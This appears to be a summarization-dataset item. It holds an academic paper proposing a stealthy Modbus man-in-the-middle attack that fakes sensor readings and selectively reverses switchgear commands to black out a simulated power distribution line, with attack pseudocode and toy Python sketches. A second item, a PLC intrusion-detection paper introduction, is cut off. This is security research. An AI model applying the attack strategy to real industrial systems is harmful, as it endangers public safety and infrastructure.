Network protocols define a set of rules to specify how network devices should format, transmit and process information. Therefore, intrusion detection rules can be extracted from network protocols. Any system behavior that violates the detection rules is judged to be abnormal. Some open protocols are commonly used in ICS communication, e.g., Modbus, DNP3, and ICCP/TASE.2. These protocols are vulnerable to a variety of malicious attacks such as eavesdropping, tampering and counterfeiting, since ICS were designed to run in relatively closed environments and security was rarely considered in the design of industrial communication protocols.
Cheung et al. [18] extract a normal system behavior model from the industrial protocol specifications. The model formalizes legal data values and legal relationships between different data fields. Furthermore, a set of communication modes is built according to the data transmission ports, transmission directions and security requirements of ICS. Any behavior that violates the normal behavior model or the communication modes should be flagged as an anomaly, so this detection technique also belongs to anomaly-based intrusion detection. Morris et al. [19] construct signatures for Modbus protocol vulnerabilities by exploiting a famous intrusion detection system, Snort. Communication data that matches any of these signatures is identified as an anomaly. Moreover, traditional IDS can be tailored or improved for intrusion detection on ICS. Lin et al. [20] successfully realize intrusion detection on ICS by implanting a DNP3 protocol parser into Bro, a network intrusion detection system developed at the University of California, Berkeley.
In addition to open protocols, proprietary protocols also play an important part in ICS communication. IDS based on proprietary protocol analysis have emerged. Hong et al. [21] extract specifications from the IEC 61850 standards (e.g., Generic Object Oriented Substation Event (GOOSE) and Sampled Value (SV) technology), based on which abnormal or malicious behaviors in electric power substations are identified. In [22], legal and illegal network traffic patterns are defined based on the protocol specifications of power systems. These patterns are further converted into Snort rules for intrusion detection.
As described above, intrusion detection based on network protocol analysis mainly relies on the accurate definition of detection rules, and usually yields a high false alarm rate and incurs a large message-parsing time overhead. Intrusion detection based on network traffic mining can overcome these shortcomings to some extent.

B. NETWORK TRAFFIC MINING-BASED INTRUSION DETECTION
Most ICS have fixed business logic, static and simple network topologies, and a small number of programs. Therefore, traffic in industrial networks is stable in most cases. Unusual traffic patterns generally indicate the occurrence of an anomaly, which is the main motivation of network traffic mining-based intrusion detection.
Traditional IDS based on network traffic mining [23] mainly rely on the analysis of network metadata, including IP addresses (i.e., source IP address for outbound packets and destination IP address for inbound packets), transmission ports, traffic durations, and packet intervals. Applying data mining techniques to network metadata can identify system anomalies effectively.
Supervised [24] and semi-supervised [25] clustering, single-class [26] or multi-class [27] support vector machines, mixed Gaussian models [28], fuzzy logic [29]–[31], neural networks [32], [33] and deep learning [34] are commonly used techniques for traffic mining. These techniques aim to model the non-linear relationships between network traffic and system behaviors. The relationship model and real-time traffic data are used to investigate the current status of the system, and then detect malicious attacks in a timely manner. However, analyzing a large number of traffic features undoubtedly incurs a high computational overhead. Therefore, techniques like principal component analysis [35] and ant colony optimization [36] are used to remove redundant traffic features and thus reduce the computational overhead.
Intrusion detection techniques based on protocol analysis and traffic mining are borrowed from the traditional network intrusion detection domain. They are mainly designed for conventional information systems. A big difference between ICS and traditional information systems (i.e., ICS are closely related to the physical world) makes it difficult for these techniques to identify attacks against physical processes, since such attacks may not violate network protocol specifications or cause abnormal network traffic. Hence, intrusion detection technology based on process data analysis has emerged.

C. PROCESS DATA ANALYSIS-BASED INTRUSION DETECTION
Industrial process data is another important information source for intrusion detection on ICS. A system operator is likely to make wrong decisions [37] if the process data is secretly counterfeited or tampered with, which may eventually cause lethal damage to ICS. Generally, the deviation between the observed and expected process values can determine whether an attack has occurred [38]. In [39], all process variables are divided into three classes: constants, enumerations, and continuous values.
Each process variable has a normal behavior pattern. Once the monitored value of a process variable does not conform to its normal behavior pattern, an alarm is raised. In [40], system states are denoted by measurement data reported by a group of remote sensors, and a corresponding state distance measurement method is presented. Anomalies can be detected by inspecting the distance between the current state and the critical states.
Time series forecasting provides another potential solution for intrusion detection on ICS. This technology can precisely predict the future outputs of ICS, which are then compared with the monitored outputs to generate residuals. By applying proper statistical techniques to the residuals, IDS can detect malicious attacks effectively. In general, the residual series conforms to a Gaussian distribution during normal operation of ICS. If an attack occurs, there will be a significant deviation between the actual and expected system behaviors, i.e., the residuals deviate from 0 notably [41]. Two kinds of intrusion detection techniques based on residual analysis are summarized in [42]: sequential detection and change detection. The first technique identifies anomalies as quickly as possible; in other words, it determines the shortest residual sequence based on which IDS can make a judgement. The second technique identifies an anomaly if the residual [43] or the cumulative residual [16] exceeds a predefined threshold at a certain time point.
Recently, Kleinmann et al. [17] proposed a multi-stage semantic attack against ICS that tampers with the measurement data and the control instructions simultaneously. They state that the Modbus protocol has no security protection mechanism or message integrity protection mechanism, which opens up a back door for malicious attackers. This vulnerability enables the adversary to reverse the semantic meaning of control instructions and present a fake view of measurement data to the HMI at the same time.
However, this attack is sometimes futile, because it cannot exactly decide which control instructions to manipulate. Randomly reversing some instructions cannot guarantee that the attack goal is realized. In this work, we design an enhanced multi-stage semantic attack against ICS, which makes full use of the system state transition rules and strategically decides which control instructions to reverse, thus bringing the target system into dangerous situations precisely. The enhanced semantic attack is totally undetectable by traditional IDS because all process values remain legal during the attack. Additionally, it can improve the attack success rate significantly when compared to the existing instruction-reversing semantic attack proposed in [17].

FIGURE 1. The Electricity Distribution Subsystem (Following [17]).

III. PRELIMINARIES
In this section, we present some preliminaries of the enhanced semantic attack, including the communication mechanism of Modbus, the architecture of the electricity distribution system (a typical industrial system), and the underlying adversary model.

A. MODBUS
Modbus is a de facto application layer protocol for ICS. This protocol supports a master-slave communication mode between different control devices, even if they are within different types of buses or networks. Most Modbus systems use TCP as the transport layer protocol. A Modbus/TCP message is embedded in TCP segments, and TCP port 502 is reserved for Modbus communications. In Modbus communications, usually the HMI acts as the unique master and the remote PLCs act as slaves. In a transaction, the master requests process data from the slaves or issues control instructions to the slaves. The slaves respond by sending the requested data to the master or by performing the control instructions.
The request message from the master contains a unique transaction ID, which should be contained in the corresponding response message. A Modbus Protocol Data Unit (PDU) consists of two fields: a single-byte Function code and a variable-size Payload (limited to 252 bytes). The Function code specifies the operation to be taken, and the Payload contains the parameters required by the function invocation. For example, the Payload of a read request consists of two fields, a reference number and a bit/word count. The former specifies the starting memory address for reading. The latter specifies the number of memory object units to be read. The Payload of the corresponding response message is comprised of two parts, byte count and data, which respectively record the length of the data in bytes and the data contents that were read. In addition to the starting memory address, the Payload of a write message has another field that specifies the data to be written.
Unfortunately, Modbus has little ability to defend itself against malicious attacks, e.g., data tampering or counterfeiting. Moreover, Modbus only uses TCP sequence numbers to provide simple session semantics, but cannot ensure message integrity or long-term session semantics. Therefore, TCP session hijacking becomes quite straightforward.

B. ELECTRICITY DISTRIBUTION SYSTEM
An electricity supply chain is typically comprised of three subsystems: generation, transmission, and distribution, as illustrated in Fig. 1. The transmission network connects the generation system with the distribution system. Electricity is transmitted from generation sites to remote distribution substations along high-voltage transmission lines. The high voltage (138 kV to 765 kV) is then converted to medium voltage (600 V to 35 kV) by substation transformers. A group of medium-voltage circuits fan out from the substation.
The medium voltage is further stepped down to low voltage (commonly 120/240 V) by the distribution transformers close to end users. In this work, we mainly discuss the distribution subsystem between the substations and distribution transformers, which was the target system of the ``BlackEnergy'' cyber-attack.
In order to improve reliability, distribution circuits are usually equipped with ``tie switches'' (also called switchgears, which are normally disconnected) to other circuits. If one of the circuits encounters an unintentional fault, it will be connected to another circuit by an adjacent switchgear. Thus, electricity flows into the faulted circuit and some necessary services are restored. The switchgears can be operated automatically or manually from the HMI.
A simplified model of the subsystem is shown in Fig. 2. Two medium-voltage circuits fan out from the substation. There are six PLCs (i.e., PLC01–PLC06) along the top circuit and four PLCs (i.e., PLC08–PLC11) along the bottom circuit. Additionally, the two distribution lines are interconnected by a normally open switchgear that is controlled by PLC07.

FIGURE 2. The Electricity Distribution Subsystem.

C. ADVERSARY MODEL
In the adversary model, we suppose that the attacker can penetrate the control network and launch a Man-In-The-Middle (MITM) attack between the HMI and remote PLCs. On the hijacked communication link, all network packets can be eavesdropped, replayed, delayed or deleted before reaching their destinations. Furthermore, the attacker can modify the packet contents and even take over the HMI to fabricate malicious control instructions. The goal of the adversary is to disrupt the normal operation of ICS and cause fatal damage to the physical system.
Furthermore, suppose that the adversary has gained sufficient knowledge of the ICS architecture, the industrial process and the way to manipulate the target system. Here, we use a somewhat weaker type of attack model: the attacker can penetrate the control network and launch MITM attacks on one or more HMI-PLC communication links simultaneously. However, this model is assumed to be stateless, i.e., it does not tamper with TCP sequence numbers. Therefore, this model cannot delete existing messages or inject fake ones. It can only manipulate the contents of existing packets.

IV. ENHANCED MULTI-STAGE SEMANTIC ATTACK
In this section, we elaborate on the strategy of the enhanced multi-stage semantic attack against ICS.

A. DEFINITION OF SYSTEM STATES
Suppose that an electricity distribution subsystem involves a set of configurable state variables denoted by {x_1, x_2, ..., x_N}, where N is the total number of state variables, and x_i ∈ {1, -1} (1 ≤ i ≤ N) is the i-th state variable, which denotes the status (closed or open) of the i-th switchgear. Hence, a state vector x can be used to represent the status of the entire system at a certain time point:

x = (x_1, x_2, ..., x_N).  (1)

All possible values of the state vector x constitute a set X. In the electricity distribution subsystem, X is comprised of three mutually exclusive subsets: a normal state set N, a fault state set F and a critical state set C. The normal states in N indicate that the system is operating normally. If there occur some unavoidable disturbances or system faults, the system enters a fault state contained in F to restore some necessary services and finally returns to the normal state. However, if the system encounters some malicious attacks, it will be brought into some dangerous or unwanted situations (i.e., critical states), like large-scale blackouts.
The normal state set N of the electricity distribution system is formalized as follows:

N = {x^{Nor_1}, x^{Nor_2}, ..., x^{Nor_L}},  (2)

where N ⊆ X, L is the total number of normal state vectors, and x^{Nor_l} (1 ≤ l ≤ L) is the l-th normal state vector, which consists of the values of the N state variables:

x^{Nor_l} = (x^{Nor_l}_1, x^{Nor_l}_2, ..., x^{Nor_l}_N).  (3)

Analogously, the fault state set and critical state set are defined by:

F = {x^{Fau_1}, x^{Fau_2}, ..., x^{Fau_K}},  (4)

and

C = {x^{Cri_1}, x^{Cri_2}, ..., x^{Cri_M}},  (5)

where F and C are two subsets of X (i.e., F ⊆ X, C ⊆ X), and K and M are the numbers of fault states and critical states, respectively. Furthermore, the fault state vector and the critical state vector are defined by:

x^{Fau_k} = (x^{Fau_k}_1, x^{Fau_k}_2, ..., x^{Fau_k}_N),  (6)

and

x^{Cri_m} = (x^{Cri_m}_1, x^{Cri_m}_2, ..., x^{Cri_m}_N),  (7)

where x^{Fau_k}_i (1 ≤ k ≤ K and 1 ≤ i ≤ N) denotes the i-th entry of the k-th fault state vector, and x^{Cri_m}_j (1 ≤ m ≤ M and 1 ≤ j ≤ N) denotes the j-th entry of the m-th critical state vector. The three subsets N, F and C are mutually exclusive and together constitute the entire state set X, i.e., N ∩ F = N ∩ C = F ∩ C = ∅ and N ∪ F ∪ C = X.

B. SYSTEM STATE TRANSITION
Based on the definition of system states, we now define the state transition rules. Suppose that the system operator can configure the target system manually, i.e., issue ``open'' or ``close'' instructions to change the status of switchgears. Therefore, we use a variable a ∈ {-1, 1, 0} to denote the different operations the system operator can take on a switchgear. The values -1, 1, and 0 represent ``open'', ``close'' and no action, respectively. Suppose that there are N operable switchgears in the system, corresponding to the N configurable state variables mentioned above. An N-tuple vector a = (a_1, a_2, ..., a_N) is used to represent all operations taken by the system operator at a certain time point. Each entry a_i ∈ {-1, 1, 0} denotes the operation taken on the i-th state variable x_i. State transition rules describe how the system behavior changes over time.
We use x_i(t) and x_i(t+1) to denote the current state and the next state of the i-th switchgear, respectively. An operation a_i(t) can drive x_i(t) to x_i(t+1), so we formalize the state transition of a switchgear as follows:

x_i(t+1) = x_i(t) ∘ a_i(t),  (8)

where the operator ∘ defines the following rule:

x_i(t+1) = { a_i(t), if a_i(t) ≠ 0;  x_i(t), otherwise.  (9)

This equation indicates that the next state x_i(t+1) is determined jointly by the current state x_i(t) and the current operation a_i(t). If no operation is taken (i.e., a_i(t) = 0), x_i(t+1) is set equal to x_i(t). Otherwise, x_i(t+1) is set equal to a_i(t). Therefore, the state transition of the entire system can be formalized by:

x(t+1) = x(t) ∘ a(t),  (10)

where the state transition of each element of the state vector x follows Eq. 8.
The state transition graph is illustrated in Fig. 3. A normal state transits to a fault state if some unavoidable disturbances or faults occur. A fault state can return to a normal state after the necessary services are restored. However, if the target system encounters a malicious attack, it is likely to enter a critical state from a normal state or a fault state.

FIGURE 3. The System State Transition Graph.

C. ATTACK STRATEGY
With the definition of system states and state transition rules, we now describe the strategy of the enhanced multi-stage semantic attack against ICS. The attack strategy mainly consists of measurement data deception and control instruction manipulation. During measurement data deception, a fake view of process data is presented to the HMI, thus inducing the system operator to take some unnecessary operations. Afterwards, the issued instructions are tampered with by the attacker to achieve specific attack goals.
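As a concrete illustration of the transition rule in Eqs. (8)–(10) and the state sets of Section IV-A, the following minimal Python sketch applies an operation vector to a state vector and checks which set the resulting state falls into. The three-switchgear system and the example state sets are hypothetical, chosen only for illustration; they are not taken from the paper.

```python
# State transition sketch: x_i in {1, -1} (closed/open), a_i in {-1, 1, 0},
# where 0 means "no action" and leaves the switchgear unchanged (Eq. 9).

def step(x, a):
    """Apply the operation vector a to the state vector x (Eq. 10)."""
    assert len(x) == len(a)
    return tuple(a_i if a_i != 0 else x_i for x_i, a_i in zip(x, a))

# Hypothetical three-switchgear system and illustrative (mutually exclusive)
# state sets N, F, C.
NORMAL = {(1, 1, -1)}      # both lines powered, tie switchgear open
FAULT = {(-1, 1, 1)}       # first switchgear open, tie switchgear closed
CRITICAL = {(-1, 1, -1)}   # first line disconnected, no restoration path

x_t = (1, 1, -1)           # current (normal) state
a_t = (-1, 0, 0)           # instruction: open the first switchgear only
x_next = step(x_t, a_t)
print(x_next)              # → (-1, 1, -1)
print(x_next in CRITICAL)  # → True
```

Iterating `step` over a sequence of operation vectors traces exactly one path through the state transition graph of Fig. 3.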
Below we elaborate on the two attack steps.

1) MEASUREMENT DATA DECEPTION
During measurement data deception, the attacker can change the measurement data, e.g., current and voltage values reported by victim PLCs, to any legitimate value, thus bypassing IDS. Suppose that the victim PLCs are those controlling the top line in Fig. 2 (i.e., PLC01 to PLC06). The left graph in Fig. 4 shows the actual values of the current and voltage reported by PLC01. The right graph depicts the fake values of the same measurement data presented to the HMI. When the system is attacked (from 240 s to 270 s), zero current and zero voltage are presented to the HMI. The fake view simulates a natural fault on the top line, so it is not regarded as a malicious attack. In other words, the attack is totally stealthy. The fake view misleads the system operator into taking unnecessary remediation measures, which may be costly and harmful. Furthermore, it provides the attacker a good opportunity to manipulate the control instructions maliciously.

2) CONTROL INSTRUCTION MANIPULATION
Once the system operator observes the zero current and zero voltage reported by remote PLCs for a period of time, he will drive the system to a fault state by issuing specific control instructions. Suppose that a set of control instructions denoted by a_{n_l→f_k} is issued to change the status of one or more switchgears. At this moment, the attacker can change the vector a_{n_l→f_k} to a malicious one a_{n_l→c_m} before the instructions reach their destinations, thus bringing the system into a critical state. Here, a_{n_l→f_k} and a_{n_l→c_m} are the operation vectors that can drive the system from the normal state to a fault state and a critical state, respectively. In order to bypass intrusion detection, the tampered instructions should meet the following two conditions: 1) |a_{n_l→f_k}| = |a_{n_l→c_m}| and 2) a_{n_l→f_k} ≠ a_{n_l→c_m}, where |a| = (|a_k|)_{1≤k≤N} denotes the vector of absolute values of a's elements.
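The two stealth conditions above admit a direct check. The following is a minimal Python sketch with hypothetical three-entry operation vectors (the values are illustrative, not taken from the paper):

```python
# Check the stealth conditions on a tampered operation vector:
# 1) element-wise |original| == |tampered|, so the attack touches exactly the
#    same switchgears (no instruction dropped, none injected);
# 2) original != tampered, so at least one instruction is actually reversed.

def is_valid_tampering(original, tampered):
    if len(original) != len(tampered):
        return False
    same_targets = all(abs(o) == abs(m) for o, m in zip(original, tampered))
    return same_targets and original != tampered

a_nl_fk = (1, 0, -1)    # operator's instructions: drive normal -> fault state
a_nl_cm = (-1, 0, -1)   # attacker's version: reverses only the first instruction
print(is_valid_tampering(a_nl_fk, a_nl_cm))     # → True
print(is_valid_tampering(a_nl_fk, (1, 1, -1)))  # → False: injects a new instruction
```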
Thus, no existing instruction is dropped and no fabricated instruction is injected. Additionally, all instruction values remain legitimate in the tampered messages, so the attack is totally stealthy.
If the attacker fails to manipulate the instructions in this step, he has another chance. When the system has restored the necessary services, it should return to the normal state from the fault state once the system operator issues the corresponding instructions a_{f_k→n_l}. At this moment, the attacker can rewrite a_{f_k→n_l} into a malicious vector a_{f_k→c_m}, in order to bring the system into a critical state. Analogously, a_{f_k→c_m} should satisfy |a_{f_k→n_l}| = |a_{f_k→c_m}| and a_{f_k→n_l} ≠ a_{f_k→c_m}. Once the system enters a critical state, the attack goal is achieved.

FIGURE 4. Measurement Data Deception Attack.

The entire procedure of the Enhanced Multi-Stage Semantic Attack (EM2SA for short) is summarized in Algorithm 1. The normal, fault and critical system state sets are used as inputs to the algorithm. The output of the algorithm is a boolean variable flag that indicates whether the semantic attack is successful or not. The initial value of flag is set to false, as shown in line 1. Lines 2 and 3 make
some preparations, including building the state transition graph and getting a Man-In-The-Middle position in the control network. Lines 4 to 20 are the whole procedure of the semantic attack. Line 4 launches the measurement data deception attack when the system operates normally, which presents a fake view of the measurement data to the HMI. Afterwards, the attacker tampers with the instructions issued by the system operator and waits for the system state transition (lines 6 and 7). If this attack is successful (i.e., the system enters a critical state: state_system ∈ C), the output variable flag is set to true and the attack procedure ends (lines 8 to 10). Otherwise, the attacker has another chance to manipulate the control instructions when the system is going back to the normal state, as shown in lines 11 to 19. If both attacks are unsuccessful, the attacking procedure should be restarted. Line 21 returns the output variable flag.

Algorithm 1 EM2SA Algorithm
Input: the normal, fault and critical system state collections N, F and C
Output: a flag indicating whether the attack is successful or not
1:  flag ← false;
2:  construct the state transition graph G;
3:  penetrate the control network to get a Man-In-The-Middle position;
4:  launch the measurement data deception attack when state_system ∈ N;
5:  while true do
6:    tamper with the control instruction a_{n_l→f_k} to a_{n_l→c_m}, which satisfies |a_{n_l→f_k}| = |a_{n_l→c_m}| and a_{n_l→f_k} ≠ a_{n_l→c_m};
7:    wait for the system state transition;
8:    if state_system ∈ C then
9:      flag ← true;
10:     break;
11:   else
12:     launch the measurement data deception attack;
13:     tamper with the new control instruction a_{f_k→n_l} to a_{f_k→c_m}, which satisfies |a_{f_k→n_l}| = |a_{f_k→c_m}| and a_{f_k→n_l} ≠ a_{f_k→c_m};
14:     wait for the system state transition;
15:     if state_system ∈ C then
16:       flag ← true;
17:       break;
18:     end
19:   end
20: end
21: return flag;

V. EXPERIMENTS AND DISCUSSION
In this section, we simulate the above-mentioned electricity distribution subsystem in the Java language and launch two different semantic attacks on the simulated system.
The architecture of the simulated ICS is depicted in Fig. 2, including a substation and two radial distribution lines, each with a group of PLCs. One virtual machine is used to simulate the HMI, which acts as the Modbus master. Other virtual machines simulate the remote PLCs, which serve as the Modbus slaves. On the simulated system, we launch two attacks, the enhanced multi-stage semantic attack proposed in this work and the instruction-reversing semantic attack proposed in [17], and compare the success rates of the two attacks.
We present the normal current values reported by three key PLCs (PLC01, PLC07 and PLC11) and the normal voltage value reported by PLC01 in Fig. 5. The voltage value remains stable, while the current values measured by PLC01 and PLC11 vary with the changing loads. The switchgear controlled by PLC07 stays open when the system operates normally, so the current reported by PLC07 is zero.

FIGURE 5. Normal Measurement Data.

Fig. 6a and Fig. 6b respectively show the fake measurement data presented to the HMI and the actual measurement data when the system encounters the instruction-reversing semantic attack proposed in [17]. As we can see from Fig. 6a, the measurement data deception starts at 210 s. After that, the system operator observes zero current and zero voltage at PLC01 on the HMI. Therefore, the system operator issues control instructions to open the switchgear controlled by PLC01 and close the switchgear controlled by PLC07 at 240 s. Thus the system enters a fault state and the top line begins to restore necessary services.

FIGURE 6. The Fake and Actual Measurement Data during the Instruction-Reversing Semantic Attack [17].

FIGURE 7. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by One-Step Instruction Tampering.
After 240 s, the HMI is still provided with a fake view of the measurement data: small values of the current and voltage at PLC01, misleading the system operator into believing the system is being restored. After a period of time, the operator issues control instructions to connect the switchgear controlled by PLC01 and disconnect the switchgear controlled by PLC07 at 270 s, in order to bring the system back to normal. Afterwards, the attacker shows the normal current and voltage values to the HMI, presenting an illusion that the system has returned to normal. However, the actual status of the system is shown in Fig. 6b. The attacker reverses each control instruction at 240 s and 270 s. In detail, the switchgears controlled by PLC01 and PLC07 are respectively closed and opened at 240 s, and then respectively opened and closed at 270 s. Therefore, the two switchgears maintain the status quo from 240 s to 270 s, and the measurement data are normal during this period. From 270 s, the system enters a superfluous fault recovery phase, so the currents at PLC01 and PLC07 and the voltage at PLC01 are significantly smaller than their normal values. Therefore, the attack goal is not achieved, since the system does not enter a critical state.
Fig. 7 shows the fake and actual measurement data during the enhanced multi-stage semantic attack proposed in this work. Firstly, we suppose that the first-step instruction tampering succeeds. Similar to Fig. 6a, Fig. 7a shows that the measurement data deception starts at 210 s. After tampering with the ``fault recovery'' instructions successfully, the attacker presents the small current and voltage values to the HMI after 240 s, misleading the system operator into believing the system is being restored. However, as shown in Fig.
7b, the attacker manipulates the instructions strategically at 240 s according to Algorithm 1, i.e., reversing the instruction sent to PLC01 while keeping the instruction sent to PLC07 unchanged, in order to bring the system into a critical state. Hence, the actual current and voltage at PLC01 become zero at 240 s, which indicates a blackout on the top transmission line, so the attack goal is achieved.
If the first-step instruction tampering is unsuccessful, the attacker has another chance. As depicted in Fig. 8, the attacker fails to tamper with the control instructions at 240 s, but succeeds in manipulating the instruction sent to PLC01 at 270 s. Therefore, the system enters a critical state after 270 s (both the current and voltage at PLC01 become zero), as shown in Fig. 8b, but the fake measurement data presented to the HMI are normal after 270 s, as shown in Fig. 8a.

FIGURE 8. The Fake and Actual Measurement Data during the Enhanced Semantic Attack that Succeeds by Two-Step Instruction Tampering.

Figs. 7 and 8 indicate that there are two possible paths from the normal state to a critical state during the enhanced multi-stage semantic attack, which are represented by the two red dashed lines in Fig. 9.

FIGURE 9. Two Attack Paths During the Enhanced Semantic Attack.

In particular, if the attacker randomly chooses one or more instructions to tamper with during the instruction-reversing semantic attack proposed in [17], the proposed enhanced semantic attack is a special case of that kind of attack. Additionally, suppose that each instruction tampering attack has a Probability of Failure (PoF for short). Based on these assumptions, we compare the success rates of the two kinds of semantic attacks on the simulated system. The instruction-reversing semantic attack randomly chooses whether to reverse
an eavesdropped instruction, while the enhanced semantic attack manipulates an instruction strategically according to Algorithm 1. In this experiment, PoF varies from 0.1 to 0.9, with a step value of 0.1. For each value of PoF, we conduct 5000 simulations of each attack. The comparison of the two attacks is illustrated in Fig. 10. Obviously, the success rate of the enhanced multi-stage semantic attack is significantly higher than that of the instruction-reversing attack, which verifies the stronger attack ability of the enhanced attack.

FIGURE 10. Comparison of Attack Success Rates of Two Kinds of Attacks.

VI. CONCLUSION
In this paper, we propose an enhanced multi-stage semantic attack against ICS. During this attack, a fake view of measurement data is first presented to the HMI to mislead the system operator into issuing unnecessary control instructions. Thus, the attacker has chances to manipulate the control instructions strategically according to system state transition rules, and precisely bring the target system into a critical state. In the meantime, the measurement data deception attack is continued in order to conceal the ongoing attack. Furthermore, this attack is totally stealthy, since the command sequences, message sizes, and process values all remain legitimate. To verify the strong attack ability of the enhanced multi-stage semantic attack, we simulate an electricity distribution subsystem in the Java language. Additionally, we compare the attack success rate of the enhanced semantic attack with that of the existing instruction-reversing semantic attack. The experimental results show that the enhanced semantic attack can significantly improve the attack success rate.
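For intuition, the success-rate comparison above can be reproduced in miniature with a Monte Carlo sketch. The two-instruction scenario, the uniform random choice made by the baseline attacker, and all function names are modeling assumptions for illustration; this is not the paper's Java simulator.

```python
import random

# Monte Carlo sketch: each tampering attempt fails with probability PoF, and
# both attacks get the two chances shown in Fig. 9 (the normal->fault and
# fault->normal transitions).

def enhanced_success(pof, rng):
    # Strategic attacker: always targets the right instruction, so it succeeds
    # as soon as either tampering attempt goes through.
    return rng.random() > pof or rng.random() > pof

def random_reversal_success(pof, rng):
    # Baseline attacker: reverses each of the two instructions with prob. 0.5;
    # assume only one of the four patterns leads to a critical state.
    for _ in range(2):
        pattern_ok = rng.random() < 0.25
        if pattern_ok and rng.random() > pof:
            return True
    return False

def success_rate(attack, pof, trials=5000, seed=7):
    rng = random.Random(seed)  # fixed seed for a reproducible estimate
    return sum(attack(pof, rng) for _ in range(trials)) / trials

for pof in (0.1, 0.5, 0.9):
    print(pof, success_rate(enhanced_success, pof),
          success_rate(random_reversal_success, pof))
```

Under this model the strategic attack succeeds with probability 1 − PoF², while the baseline is further limited by its odds of guessing the right reversal pattern, mirroring the gap shown in Fig. 10.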
In future research, we will investigate the proposed attack on real-world, large-scale ICS testbeds and seek effective countermeasures against this kind of attack, e.g., securing the communication channel via cryptographic means, such as adding data-integrity protections (digital signatures or message authentication codes) to prevent the attacker from modifying packets.
Summary:
Industrial Control Systems (ICS) play a very important role in national critical infrastructures. However, the growing interaction between modern ICS and the Internet has made ICS more vulnerable to cyber attacks. In order to protect ICS from malicious attacks, intrusion detection technology has emerged. By analyzing network metadata or industrial process data, Intrusion Detection Systems (IDS) can identify attacks that violate communication protocols or system specifications. However, existing intrusion detection technology is not omnipotent, which opens a back door for more advanced attacks. In this work, we design an enhanced multi-stage semantic attack against ICS that is undetectable by existing IDS. By hijacking the communication channels between the Human Machine Interface (HMI) and the remote Programmable Logic Controllers (PLCs), the attacker can manipulate the measurement data and control instructions simultaneously. The fake measurement data deceive the human operator into making wrong decisions. Furthermore, the attacker can strategically manipulate the semantic meaning of control instructions according to system state-transition rules. Meanwhile, a fake view of the measurement data is presented to the HMI to conceal the ongoing malicious attack. This attack is totally stealthy since the message sizes and timing, the command sequences, and the system state values are all legitimate. Consequently, this attack can secretly bring the system into critical states. Experimental results have verified the strong attack ability of the proposed attack.
|
Summarize:
I. INTRODUCTION The security of Programmable Logic Controllers (PLCs) is increasingly becoming a vital issue in securing industrial control systems (ICS). There is an inherent difficulty in integrating security into these PLCs, as they are intended to be simple computing machines whose programs can be easily verified against the underlying physical systems they control. Adding advanced security tools can compromise time-sensitive operations as well as the general temporal attributes of the cyber-physical system. The security of PLCs continues to receive increased attention in the wake of ICS-targeted malware. ICS-CERT reports that in FY 2015 [1] it responded to 295 reported incidents involving critical infrastructure in the United States. Most programming and operator commands are sent using insecure proprietary network protocols. Not only have proprietary protocols been reverse engineered, but open-source APIs [2] have been released that allow programmers to develop invasive tools that can be used with malicious intent, such as PLCInject [3]. Additionally, open-source packet dissectors have been developed for network protocol analyzers. The reverse engineering of certain proprietary protocols has resulted in new protocols being developed with encrypted communication. Although these protocols can provide secure communication for the latest products, they are typically only supported by newer devices, while legacy devices remain vulnerable to packet-injection attacks. Offline security solutions such as TSV [4] and [5] have been proposed as bump-in-the-wire verification mechanisms sitting between the operator/programmer interface and the PLC. These solutions have provided the ability to verify the programs downloaded to the PLC against temporal safety properties. Furthermore, models have been proposed for offline analysis of periodic traffic to and from a PLC [6].
These solutions were typically provided as external solutions, where more advanced processing systems are coupled with the PLC system to verify the programming inputs of the PLC. This allows for advanced operations that require an abundance of memory, such as the calculation of advanced physical properties of a system or the processing of network traffic. Modular embedded controllers introduced the concept of coupling a PLC with an embedded hypervisor. The hypervisors are typically much more advanced embedded operating systems than the actual PLC. APIs are provided for developing programs that can be directly integrated into the programming blocks of the PLC, either synchronously or asynchronously, through shared memory between the PLC and the hypervisor. Development environments are provided to generate programming blocks that can call an associated library function on the hypervisor, e.g., a DLL file on a Windows hypervisor, allowing the PLC to pass inputs to and take outputs from the library function within the main PLC scan cycle [7]. In this paper, we leverage these coupled environments to implement online security solutions directly integrated into the PLC. (978-1-5090-2002-7/16/$31.00 2016 IEEE. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:43:42 UTC from IEEE Xplore. Restrictions apply.) We first provide a novel approach to implementing a cyber-physical verification solution directly integrated into the scan cycle of the PLC, using the embedded hypervisor to perform advanced calculations of the underlying physical system. We then present an online monitoring solution that provides an IDS based on the aforementioned security models of periodic PLC traffic. Before providing further details of our solutions, it is important to note that industrial control systems should always be secured using a holistic approach, as outlined in security standards such as IEC 62443.
The layered security architecture derived from IEC 62443 can be summarized by considering Plant Security, Network Security, and System Integrity, as shown in Figure 1. Fig. 1. The Concept of Defense-in-Depth. Security solutions as applied in an industrial context must take into account these layers of protection. For example, the solutions described in this paper are part of the System Integrity layer, which supports detection of attacks. This paper is organized as follows. First, we provide a high-level overview of how our security solutions are integrated into PLCs, as well as our threat model, in Section II. Then we present a model for a cyber-physical verification solution that leverages the shared memory between the PLC and the embedded hypervisor in Section III. Next, we present a model for a passive intrusion detection solution within the embedded hypervisor that provides online modeling of the network traffic within the PLC in Section IV. We then show how we implemented and evaluated our security solutions in Section V. Finally, we present related work in Section VI and conclude in Section VII. II. OVERVIEW The two security solutions presented in this paper leverage the coupling of embedded hypervisors and PLCs. Figure 2 shows an overview of how both models would be integrated into the PLC. Fig. 2. System Overview. The coupled system communicates with the control system network. The PLC runs the control logic program that interfaces with the underlying physical system. The embedded hypervisor shares memory with the PLC and can run models with advanced calculations for protocol analysis and safety verification. For our cyber-physical verification solution, programming blocks are generated and directly integrated, synchronously or asynchronously, into the main scan cycle of
the PLC that shares memory with a library on the embedded hypervisor. The threat model for this solution assumes that memory-protection mechanisms are in place that can limit PLC clients to writing to designated areas of memory. As we will detail in Section III, these designated areas are treated as temporary buffers: the data, along with the system state, is verified within the embedded hypervisor before being forwarded to a destination buffer. Therefore, this model assumes that an attacker cannot circumvent this mechanism by directly writing to the destination buffer. If the proprietary protocol in question has been reverse engineered, then the attacker might have the ability to remotely program the PLC and dictate the control flow of the program. The second, IDS solution allows online intrusion detection from within the PLC. Its threat model assumes that the hypervisor is inaccessible, i.e., cannot be tampered with, and that the hypervisor shares the same Ethernet channel as the PLC. This allows the embedded hypervisor to directly monitor all traffic coming into the PLC Ethernet port and to model the PLC from within the embedded hypervisor. Additionally, in both cases, the threat model assumes that a secure reporting mechanism is in place. Although the solutions provide detection mechanisms and active verification, they do not emphasize secure reporting mechanisms to the operators and/or programmers. Actionable items upon intrusion 